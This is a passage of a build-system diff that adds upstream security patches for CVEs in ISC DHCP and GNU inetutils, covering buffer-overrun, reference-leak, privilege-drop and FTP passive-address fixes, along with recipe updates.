+ file://CVE-2023-28488.patch \
"
SRC_URI_append_libc-musl = " file://0002-resolve-musl-does-not-implement-res_ninit.patch"
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch
new file mode 100644
index 0000000000..91aaf83a77
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2021-25217.patch
@@ -0,0 +1,66 @@
+From 5a7344b05081d84343a1627e47478f3990b17700 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 8 Jul 2021 00:08:25 +0000
+Subject: [PATCH] ISC has disclosed a vulnerability in ISC DHCP
+ (CVE-2021-25217)
+
+On May 26, 2021, we (Internet Systems Consortium) disclosed a
+vulnerability affecting our ISC DHCP software:
+
+ CVE-2021-25217: A buffer overrun in lease file parsing code can be
+ used to exploit a common vulnerability shared by dhcpd and dhclient
+ https://kb.isc.org/docs/cve-2021-25217
+
+New versions of ISC DHCP are available from https://www.isc.org/downloads
+
+Operators and package maintainers who prefer to apply patches selectively can
+find individual vulnerability-specific patches in the "patches" subdirectory
+of the release directories for our two stable release branches (4.4 and 4.1-ESV)
+
+ https://downloads.isc.org/isc/dhcp/4.4.2-P1/patches
+ https://downloads.isc.org/isc/dhcp/4.1-ESV-R16-P1/patches
+
+With the public announcement of this vulnerability, the embargo
+period is ended and any updated software packages that have been
+prepared may be released.
+
+Upstream-Status: Accepted [https://www.openwall.com/lists/oss-security/2021/05/26/6]
+CVE: CVE-2021-25217
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ common/parse.c | 7 ++++---
+ 1 file changed, 4 insertions(+), 3 deletions(-)
+
+diff --git a/common/parse.c b/common/parse.c
+index 386a632..fc7b39c 100644
+--- a/common/parse.c
++++ b/common/parse.c
+@@ -3,7 +3,7 @@
+ Common parser code for dhcpd and dhclient. */
+
+ /*
+- * Copyright (c) 2004-2019 by Internet Systems Consortium, Inc. ("ISC")
++ * Copyright (c) 2004-2021 by Internet Systems Consortium, Inc. ("ISC")
+ * Copyright (c) 1995-2003 by Internet Software Consortium
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+@@ -5556,13 +5556,14 @@ int parse_X (cfile, buf, max)
+ skip_to_semi (cfile);
+ return 0;
+ }
+- convert_num (cfile, &buf [len], val, 16, 8);
+- if (len++ > max) {
++ if (len >= max) {
+ parse_warn (cfile,
+ "hexadecimal constant too long.");
+ skip_to_semi (cfile);
+ return 0;
+ }
++ convert_num (cfile, &buf [len], val, 16, 8);
++ len++;
+ token = peek_token (&val, (unsigned *)0, cfile);
+ if (token == COLON)
+ token = next_token (&val,
+--
+2.17.1
+
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch
new file mode 100644
index 0000000000..11f162cbda
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2928.patch
@@ -0,0 +1,120 @@
+From 8a5d739eea10ee6e193f053b1662142d5657cbc6 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 6 Oct 2022 09:39:18 +0530
+Subject: [PATCH] CVE-2022-2928
+
+Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/]
+CVE: CVE-2022-2928
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common/options.c | 7 +++++
+ common/tests/option_unittest.c | 54 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 61 insertions(+)
+
+diff --git a/common/options.c b/common/options.c
+index a7ed84c..4e53bb4 100644
+--- a/common/options.c
++++ b/common/options.c
+@@ -4452,6 +4452,8 @@ add_option(struct option_state *options,
+ if (!option_cache_allocate(&oc, MDL)) {
+ log_error("No memory for option cache adding %s (option %d).",
+ option->name, option_num);
++ /* Get rid of reference created during hash lookup. */
++ option_dereference(&option, MDL);
+ return 0;
+ }
+
+@@ -4463,6 +4465,8 @@ add_option(struct option_state *options,
+ MDL)) {
+ log_error("No memory for constant data adding %s (option %d).",
+ option->name, option_num);
++ /* Get rid of reference created during hash lookup. */
++ option_dereference(&option, MDL);
+ option_cache_dereference(&oc, MDL);
+ return 0;
+ }
+@@ -4471,6 +4475,9 @@ add_option(struct option_state *options,
+ save_option(&dhcp_universe, options, oc);
+ option_cache_dereference(&oc, MDL);
+
++ /* Get rid of reference created during hash lookup. */
++ option_dereference(&option, MDL);
++
+ return 1;
+ }
+
+diff --git a/common/tests/option_unittest.c b/common/tests/option_unittest.c
+index cd52cfb..690704d 100644
+--- a/common/tests/option_unittest.c
++++ b/common/tests/option_unittest.c
+@@ -130,6 +130,59 @@ ATF_TC_BODY(pretty_print_option, tc)
+ }
+
+
++ATF_TC(add_option_ref_cnt);
++
++ATF_TC_HEAD(add_option_ref_cnt, tc)
++{
++ atf_tc_set_md_var(tc, "descr",
++ "Verify add_option() does not leak option ref counts.");
++}
++
++ATF_TC_BODY(add_option_ref_cnt, tc)
++{
++ struct option_state *options = NULL;
++ struct option *option = NULL;
++ unsigned int cid_code = DHO_DHCP_CLIENT_IDENTIFIER;
++ char *cid_str = "1234";
++ int refcnt_before = 0;
++
++ // Look up the option we're going to add.
++ initialize_common_option_spaces();
++ if (!option_code_hash_lookup(&option, dhcp_universe.code_hash,
++ &cid_code, 0, MDL)) {
++ atf_tc_fail("cannot find option definition?");
++ }
++
++ // Get the option's reference count before we call add_options.
++ refcnt_before = option->refcnt;
++
++ // Allocate a option_state to which to add an option.
++ if (!option_state_allocate(&options, MDL)) {
++ atf_tc_fail("cannot allocat options state");
++ }
++
++ // Call add_option() to add the option to the option state.
++ if (!add_option(options, cid_code, cid_str, strlen(cid_str))) {
++ atf_tc_fail("add_option returned 0");
++ }
++
++ // Verify that calling add_option() only adds 1 to the option ref count.
++ if (option->refcnt != (refcnt_before + 1)) {
++ atf_tc_fail("after add_option(), count is wrong, before %d, after: %d",
++ refcnt_before, option->refcnt);
++ }
++
++ // Derefrence the option_state, this should reduce the ref count to
++ // it's starting value.
++ option_state_dereference(&options, MDL);
++
++ // Verify that dereferencing option_state restores option ref count.
++ if (option->refcnt != refcnt_before) {
++ atf_tc_fail("after state deref, count is wrong, before %d, after: %d",
++ refcnt_before, option->refcnt);
++ }
++}
++
+ /* This macro defines main() method that will call specified
+ test cases. tp and simple_test_case names can be whatever you want
+ as long as it is a valid variable identifier. */
+@@ -137,6 +190,7 @@ ATF_TP_ADD_TCS(tp)
+ {
+ ATF_TP_ADD_TC(tp, option_refcnt);
+ ATF_TP_ADD_TC(tp, pretty_print_option);
++ ATF_TP_ADD_TC(tp, add_option_ref_cnt);
+
+ return (atf_no_error());
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch
new file mode 100644
index 0000000000..d605204f89
--- /dev/null
+++ b/meta/recipes-connectivity/dhcp/dhcp/CVE-2022-2929.patch
@@ -0,0 +1,40 @@
+From 5c959166ebee7605e2048de573f2475b4d731ff7 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 6 Oct 2022 09:42:59 +0530
+Subject: [PATCH] CVE-2022-2929
+
+Upstream-Status: Backport [https://downloads.isc.org/isc/dhcp/4.4.3-P1/patches/]
+CVE: CVE-2022-2929
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common/options.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/common/options.c b/common/options.c
+index 4e53bb4..28800fc 100644
+--- a/common/options.c
++++ b/common/options.c
+@@ -454,16 +454,16 @@ int fqdn_universe_decode (struct option_state *options,
+ while (s < &bp -> data[0] + length + 2) {
+ len = *s;
+ if (len > 63) {
+- log_info ("fancy bits in fqdn option");
+- return 0;
++ log_info ("label length exceeds 63 in fqdn option");
++ goto bad;
+ }
+ if (len == 0) {
+ terminated = 1;
+ break;
+ }
+ if (s + len > &bp -> data [0] + length + 3) {
+- log_info ("fqdn tag longer than buffer");
+- return 0;
++ log_info ("fqdn label longer than buffer");
++ goto bad;
+ }
+
+ if (first_len == 0) {
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb b/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
index b56a204821..d3c87d0d07 100644
--- a/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
+++ b/meta/recipes-connectivity/dhcp/dhcp_4.4.2.bb
@@ -10,6 +10,9 @@ SRC_URI += "file://0001-define-macro-_PATH_DHCPD_CONF-and-_PATH_DHCLIENT_CON.pat
file://0012-dhcp-correct-the-intention-for-xml2-lib-search.patch \
file://0013-fixup_use_libbind.patch \
file://0001-workaround-busybox-limitation-in-linux-dhclient-script.patch \
+ file://CVE-2021-25217.patch \
+ file://CVE-2022-2928.patch \
+ file://CVE-2022-2929.patch \
"
SRC_URI[md5sum] = "2afdaf8498dc1edaf3012efdd589b3e1"
diff --git a/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch b/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch
new file mode 100644
index 0000000000..aea07bd803
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch
@@ -0,0 +1,283 @@
+From 703418fe9d2e3b1e8d594df5788d8001a8116265 Mon Sep 17 00:00:00 2001
+From: Jeffrey Bencteux <jeffbencteux@gmail.com>
+Date: Fri, 30 Jun 2023 19:02:45 +0200
+Subject: [PATCH] CVE-2023-40303: ftpd,rcp,rlogin,rsh,rshd,uucpd: fix: check
+ set*id() return values
+
+Several setuid(), setgid(), seteuid() and setguid() return values
+were not checked in ftpd/rcp/rlogin/rsh/rshd/uucpd code potentially
+leading to potential security issues.
+
+CVE: CVE-2023-40303
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=e4e65c03f4c11292a3e40ef72ca3f194c8bffdd6]
+Signed-off-by: Jeffrey Bencteux <jeffbencteux@gmail.com>
+Signed-off-by: Simon Josefsson <simon@josefsson.org>
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ftpd/ftpd.c | 10 +++++++---
+ src/rcp.c | 39 +++++++++++++++++++++++++++++++++------
+ src/rlogin.c | 11 +++++++++--
+ src/rsh.c | 25 +++++++++++++++++++++----
+ src/rshd.c | 20 +++++++++++++++++---
+ src/uucpd.c | 15 +++++++++++++--
+ 6 files changed, 100 insertions(+), 20 deletions(-)
+
+diff --git a/ftpd/ftpd.c b/ftpd/ftpd.c
+index 5db88d0..b52b122 100644
+--- a/ftpd/ftpd.c
++++ b/ftpd/ftpd.c
+@@ -862,7 +862,9 @@ end_login (struct credentials *pcred)
+ char *remotehost = pcred->remotehost;
+ int atype = pcred->auth_type;
+
+- seteuid ((uid_t) 0);
++ if (seteuid ((uid_t) 0) == -1)
++ _exit (EXIT_FAILURE);
++
+ if (pcred->logged_in)
+ {
+ logwtmp_keep_open (ttyline, "", "");
+@@ -1151,7 +1153,8 @@ getdatasock (const char *mode)
+
+ if (data >= 0)
+ return fdopen (data, mode);
+- seteuid ((uid_t) 0);
++ if (seteuid ((uid_t) 0) == -1)
++ _exit (EXIT_FAILURE);
+ s = socket (ctrl_addr.ss_family, SOCK_STREAM, 0);
+ if (s < 0)
+ goto bad;
+@@ -1978,7 +1981,8 @@ passive (int epsv, int af)
+ else /* !AF_INET6 */
+ ((struct sockaddr_in *) &pasv_addr)->sin_port = 0;
+
+- seteuid ((uid_t) 0);
++ if (seteuid ((uid_t) 0) == -1)
++ _exit (EXIT_FAILURE);
+ if (bind (pdata, (struct sockaddr *) &pasv_addr, pasv_addrlen) < 0)
+ {
+ if (seteuid ((uid_t) cred.uid))
+diff --git a/src/rcp.c b/src/rcp.c
+index bafa35f..366295c 100644
+--- a/src/rcp.c
++++ b/src/rcp.c
+@@ -347,14 +347,23 @@ main (int argc, char *argv[])
+ if (from_option)
+ { /* Follow "protocol", send data. */
+ response ();
+- setuid (userid);
++
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
++
+ source (argc, argv);
+ exit (errs);
+ }
+
+ if (to_option)
+ { /* Receive data. */
+- setuid (userid);
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
++
+ sink (argc, argv);
+ exit (errs);
+ }
+@@ -539,7 +548,11 @@ toremote (char *targ, int argc, char *argv[])
+ if (response () < 0)
+ exit (EXIT_FAILURE);
+ free (bp);
+- setuid (userid);
++
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
+ }
+ source (1, argv + i);
+ close (rem);
+@@ -634,7 +647,12 @@ tolocal (int argc, char *argv[])
+ ++errs;
+ continue;
+ }
+- seteuid (userid);
++
++ if (seteuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
++
+ #if defined IP_TOS && defined IPPROTO_IP && defined IPTOS_THROUGHPUT
+ sslen = sizeof (ss);
+ (void) getpeername (rem, (struct sockaddr *) &ss, &sslen);
+@@ -647,7 +665,12 @@ tolocal (int argc, char *argv[])
+ #endif
+ vect[0] = target;
+ sink (1, vect);
+- seteuid (effuid);
++
++ if (seteuid (effuid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
++
+ close (rem);
+ rem = -1;
+ #ifdef SHISHI
+@@ -1453,7 +1476,11 @@ susystem (char *s, int userid)
+ return (127);
+
+ case 0:
+- setuid (userid);
++ if (setuid (userid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
++
+ execl (PATH_BSHELL, "sh", "-c", s, NULL);
+ _exit (127);
+ }
+diff --git a/src/rlogin.c b/src/rlogin.c
+index e5e11a7..6b38901 100644
+--- a/src/rlogin.c
++++ b/src/rlogin.c
+@@ -649,8 +649,15 @@ try_connect:
+ /* Now change to the real user ID. We have to be set-user-ID root
+ to get the privileged port that rcmd () uses. We now want, however,
+ to run as the real user who invoked us. */
+- seteuid (uid);
+- setuid (uid);
++ if (seteuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
++
++ if (setuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
+
+ doit (&osmask); /* The old mask will activate SIGURG and SIGUSR1! */
+
+diff --git a/src/rsh.c b/src/rsh.c
+index bd70372..b451a70 100644
+--- a/src/rsh.c
++++ b/src/rsh.c
+@@ -278,8 +278,17 @@ main (int argc, char **argv)
+ {
+ if (asrsh)
+ *argv = (char *) "rlogin";
+- seteuid (getuid ());
+- setuid (getuid ());
++
++ if (seteuid (getuid ()) == -1)
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
++
++ if (setuid (getuid ()) == -1)
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
++
+ execv (PATH_RLOGIN, argv);
+ error (EXIT_FAILURE, errno, "cannot execute %s", PATH_RLOGIN);
+ }
+@@ -543,8 +552,16 @@ try_connect:
+ error (0, errno, "setsockopt DEBUG (ignored)");
+ }
+
+- seteuid (uid);
+- setuid (uid);
++ if (seteuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
++
++ if (setuid (uid) == -1)
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
++
+ #ifdef HAVE_SIGACTION
+ sigemptyset (&sigs);
+ sigaddset (&sigs, SIGINT);
+diff --git a/src/rshd.c b/src/rshd.c
+index b824a10..8cdcd06 100644
+--- a/src/rshd.c
++++ b/src/rshd.c
+@@ -1848,8 +1848,18 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ pwd->pw_shell = PATH_BSHELL;
+
+ /* Set the gid, then uid to become the user specified by "locuser" */
+- setegid ((gid_t) pwd->pw_gid);
+- setgid ((gid_t) pwd->pw_gid);
++ if (setegid ((gid_t) pwd->pw_gid) == -1)
++ {
++ rshd_error ("Cannot drop privileges (setegid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
++
++ if (setgid ((gid_t) pwd->pw_gid) == -1)
++ {
++ rshd_error ("Cannot drop privileges (setgid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
++
+ #ifdef HAVE_INITGROUPS
+ initgroups (pwd->pw_name, pwd->pw_gid); /* BSD groups */
+ #endif
+@@ -1871,7 +1881,11 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ }
+ #endif /* WITH_PAM */
+
+- setuid ((uid_t) pwd->pw_uid);
++ if (setuid ((uid_t) pwd->pw_uid) == -1)
++ {
++ rshd_error ("Cannot drop privileges (setuid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ /* We'll execute the client's command in the home directory
+ * of locuser. Note, that the chdir must be executed after
+diff --git a/src/uucpd.c b/src/uucpd.c
+index 55c3d44..6aba294 100644
+--- a/src/uucpd.c
++++ b/src/uucpd.c
+@@ -254,7 +254,12 @@ doit (struct sockaddr *sap, socklen_t salen)
+ sprintf (Username, "USER=%s", user);
+ sprintf (Logname, "LOGNAME=%s", user);
+ dologin (pw, sap, salen);
+- setgid (pw->pw_gid);
++
++ if (setgid (pw->pw_gid) == -1)
++ {
++ fprintf (stderr, "setgid() failed");
++ return;
++ }
+ #ifdef HAVE_INITGROUPS
+ initgroups (pw->pw_name, pw->pw_gid);
+ #endif
+@@ -263,7 +268,13 @@ doit (struct sockaddr *sap, socklen_t salen)
+ fprintf (stderr, "Login incorrect.");
+ return;
+ }
+- setuid (pw->pw_uid);
++
++ if (setuid (pw->pw_uid) == -1)
++ {
++ fprintf (stderr, "setuid() failed");
++ return;
++ }
++
+ execl (uucico_location, "uucico", NULL);
+ perror ("uucico server: execl");
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch b/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch
new file mode 100644
index 0000000000..4bc354d256
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch
@@ -0,0 +1,254 @@
+From 70fe022f9dac760eaece0228cad17e3d29a57fb8 Mon Sep 17 00:00:00 2001
+From: Simon Josefsson <simon@josefsson.org>
+Date: Mon, 31 Jul 2023 13:59:05 +0200
+Subject: [PATCH] CVE-2023-40303: Indent changes in previous commit.
+
+CVE: CVE-2023-40303
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=9122999252c7e21eb7774de11d539748e7bdf46d]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/rcp.c | 42 ++++++++++++++++++++++++------------------
+ src/rlogin.c | 12 ++++++------
+ src/rsh.c | 24 ++++++++++++------------
+ src/rshd.c | 24 ++++++++++++------------
+ src/uucpd.c | 16 ++++++++--------
+ 5 files changed, 62 insertions(+), 56 deletions(-)
+
+diff --git a/src/rcp.c b/src/rcp.c
+index cdcf8500..652f22e6 100644
+--- a/src/rcp.c
++++ b/src/rcp.c
+@@ -347,9 +347,10 @@ main (int argc, char *argv[])
+ response ();
+
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+
+ source (argc, argv);
+ exit (errs);
+@@ -358,9 +359,10 @@ main (int argc, char *argv[])
+ if (to_option)
+ { /* Receive data. */
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+
+ sink (argc, argv);
+ exit (errs);
+@@ -548,9 +550,10 @@ toremote (char *targ, int argc, char *argv[])
+ free (bp);
+
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+ }
+ source (1, argv + i);
+ close (rem);
+@@ -645,9 +648,10 @@ tolocal (int argc, char *argv[])
+ }
+
+ if (seteuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (seteuid() failed)");
++ }
+
+ #if defined IP_TOS && defined IPPROTO_IP && defined IPTOS_THROUGHPUT
+ sslen = sizeof (ss);
+@@ -663,9 +667,10 @@ tolocal (int argc, char *argv[])
+ sink (1, vect);
+
+ if (seteuid (effuid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (seteuid() failed)");
++ }
+
+ close (rem);
+ rem = -1;
+@@ -1465,9 +1470,10 @@ susystem (char *s, int userid)
+
+ case 0:
+ if (setuid (userid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0,
++ "Could not drop privileges (setuid() failed)");
++ }
+
+ execl (PATH_BSHELL, "sh", "-c", s, NULL);
+ _exit (127);
+diff --git a/src/rlogin.c b/src/rlogin.c
+index c543de0c..4360202f 100644
+--- a/src/rlogin.c
++++ b/src/rlogin.c
+@@ -648,14 +648,14 @@ try_connect:
+ to get the privileged port that rcmd () uses. We now want, however,
+ to run as the real user who invoked us. */
+ if (seteuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (seteuid() failed)");
++ }
+
+ if (setuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
+- }
++ {
++ error (EXIT_FAILURE, 0, "Could not drop privileges (setuid() failed)");
++ }
+
+ doit (&osmask); /* The old mask will activate SIGURG and SIGUSR1! */
+
+diff --git a/src/rsh.c b/src/rsh.c
+index 6f60667d..179b47cd 100644
+--- a/src/rsh.c
++++ b/src/rsh.c
+@@ -278,14 +278,14 @@ main (int argc, char **argv)
+ *argv = (char *) "rlogin";
+
+ if (seteuid (getuid ()) == -1)
+- {
+- error (EXIT_FAILURE, errno, "seteuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
+
+ if (setuid (getuid ()) == -1)
+- {
+- error (EXIT_FAILURE, errno, "setuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
+
+ execv (PATH_RLOGIN, argv);
+ error (EXIT_FAILURE, errno, "cannot execute %s", PATH_RLOGIN);
+@@ -551,14 +551,14 @@ try_connect:
+ }
+
+ if (seteuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, errno, "seteuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "seteuid() failed");
++ }
+
+ if (setuid (uid) == -1)
+- {
+- error (EXIT_FAILURE, errno, "setuid() failed");
+- }
++ {
++ error (EXIT_FAILURE, errno, "setuid() failed");
++ }
+
+ #ifdef HAVE_SIGACTION
+ sigemptyset (&sigs);
+diff --git a/src/rshd.c b/src/rshd.c
+index 707790e7..3a153a18 100644
+--- a/src/rshd.c
++++ b/src/rshd.c
+@@ -1848,16 +1848,16 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+
+ /* Set the gid, then uid to become the user specified by "locuser" */
+ if (setegid ((gid_t) pwd->pw_gid) == -1)
+- {
+- rshd_error ("Cannot drop privileges (setegid() failed)\n");
+- exit (EXIT_FAILURE);
+- }
++ {
++ rshd_error ("Cannot drop privileges (setegid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ if (setgid ((gid_t) pwd->pw_gid) == -1)
+- {
+- rshd_error ("Cannot drop privileges (setgid() failed)\n");
+- exit (EXIT_FAILURE);
+- }
++ {
++ rshd_error ("Cannot drop privileges (setgid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ #ifdef HAVE_INITGROUPS
+ initgroups (pwd->pw_name, pwd->pw_gid); /* BSD groups */
+@@ -1881,10 +1881,10 @@ doit (int sockfd, struct sockaddr *fromp, socklen_t fromlen)
+ #endif /* WITH_PAM */
+
+ if (setuid ((uid_t) pwd->pw_uid) == -1)
+- {
+- rshd_error ("Cannot drop privileges (setuid() failed)\n");
+- exit (EXIT_FAILURE);
+- }
++ {
++ rshd_error ("Cannot drop privileges (setuid() failed)\n");
++ exit (EXIT_FAILURE);
++ }
+
+ /* We'll execute the client's command in the home directory
+ * of locuser. Note, that the chdir must be executed after
+diff --git a/src/uucpd.c b/src/uucpd.c
+index 29cfce35..fde7b9c9 100644
+--- a/src/uucpd.c
++++ b/src/uucpd.c
+@@ -254,10 +254,10 @@ doit (struct sockaddr *sap, socklen_t salen)
+ dologin (pw, sap, salen);
+
+ if (setgid (pw->pw_gid) == -1)
+- {
+- fprintf (stderr, "setgid() failed");
+- return;
+- }
++ {
++ fprintf (stderr, "setgid() failed");
++ return;
++ }
+ #ifdef HAVE_INITGROUPS
+ initgroups (pw->pw_name, pw->pw_gid);
+ #endif
+@@ -268,10 +268,10 @@ doit (struct sockaddr *sap, socklen_t salen)
+ }
+
+ if (setuid (pw->pw_uid) == -1)
+- {
+- fprintf (stderr, "setuid() failed");
+- return;
+- }
++ {
++ fprintf (stderr, "setuid() failed");
++ return;
++ }
+
+ execl (uucico_location, "uucico", NULL);
+ perror ("uucico server: execl");
diff --git a/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch b/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch
new file mode 100644
index 0000000000..54252d6bc7
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/CVE-2021-40491.patch
@@ -0,0 +1,67 @@
+From 4e355804d57d5686defc363c70f81e6f58cd08f0 Mon Sep 17 00:00:00 2001
+From: Simon Josefsson <simon@josefsson.org>
+Date: Fri, 17 Dec 2021 21:52:18 -0800
+Subject: [PATCH] ftp: check that PASV/LSPV addresses match.
+
+* NEWS: Mention change.
+* ftp/ftp.c (initconn): Validate returned addresses.
+
+CVE: CVE-2021-40491
+
+Upstream-Status: Backport
+[https://git.savannah.gnu.org/cgit/inetutils.git/commit/?id=58cb043b190fd04effdaea7c9403416b436e50dd]
+
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ ftp/ftp.c | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/ftp/ftp.c b/ftp/ftp.c
+index 9813586..7c72cb2 100644
+--- a/ftp/ftp.c
++++ b/ftp/ftp.c
+@@ -1344,6 +1344,13 @@ initconn (void)
+ uint32_t *pu32 = (uint32_t *) &data_addr_sa4->sin_addr.s_addr;
+ pu32[0] = htonl ( (h[0] << 24) | (h[1] << 16) | (h[2] << 8) | h[3]);
+ }
++ if (data_addr_sa4->sin_addr.s_addr
++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* LPSV IPv4 */
+ else /* IPv6 */
+ {
+@@ -1374,6 +1381,13 @@ initconn (void)
+ pu32[2] = htonl ( (h[8] << 24) | (h[9] << 16) | (h[10] << 8) | h[11]);
+ pu32[3] = htonl ( (h[12] << 24) | (h[13] << 16) | (h[14] << 8) | h[15]);
+ }
++ if (data_addr_sa6->sin6_addr.s6_addr
++ != ((struct sockaddr_in6 *) &hisctladdr)->sin6_addr.s6_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* LPSV IPv6 */
+ }
+ else /* !EPSV && !LPSV */
+@@ -1394,6 +1408,13 @@ initconn (void)
+ | ((a2 & 0xff) << 8) | (a3 & 0xff) );
+ data_addr_sa4->sin_port =
+ htons (((p0 & 0xff) << 8) | (p1 & 0xff));
++ if (data_addr_sa4->sin_addr.s_addr
++ != ((struct sockaddr_in *) &hisctladdr)->sin_addr.s_addr)
++ {
++ printf ("Passive mode address mismatch.\n");
++ (void) command ("ABOR"); /* Cancel any open connection. */
++ goto bad;
++ }
+ } /* PASV */
+ else
+ {
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch b/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch
new file mode 100644
index 0000000000..da2da8da8a
--- /dev/null
+++ b/meta/recipes-connectivity/inetutils/inetutils/CVE-2022-39028.patch
@@ -0,0 +1,54 @@
+From eaae65aac967f9628787dca4a2501ca860bb6598 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
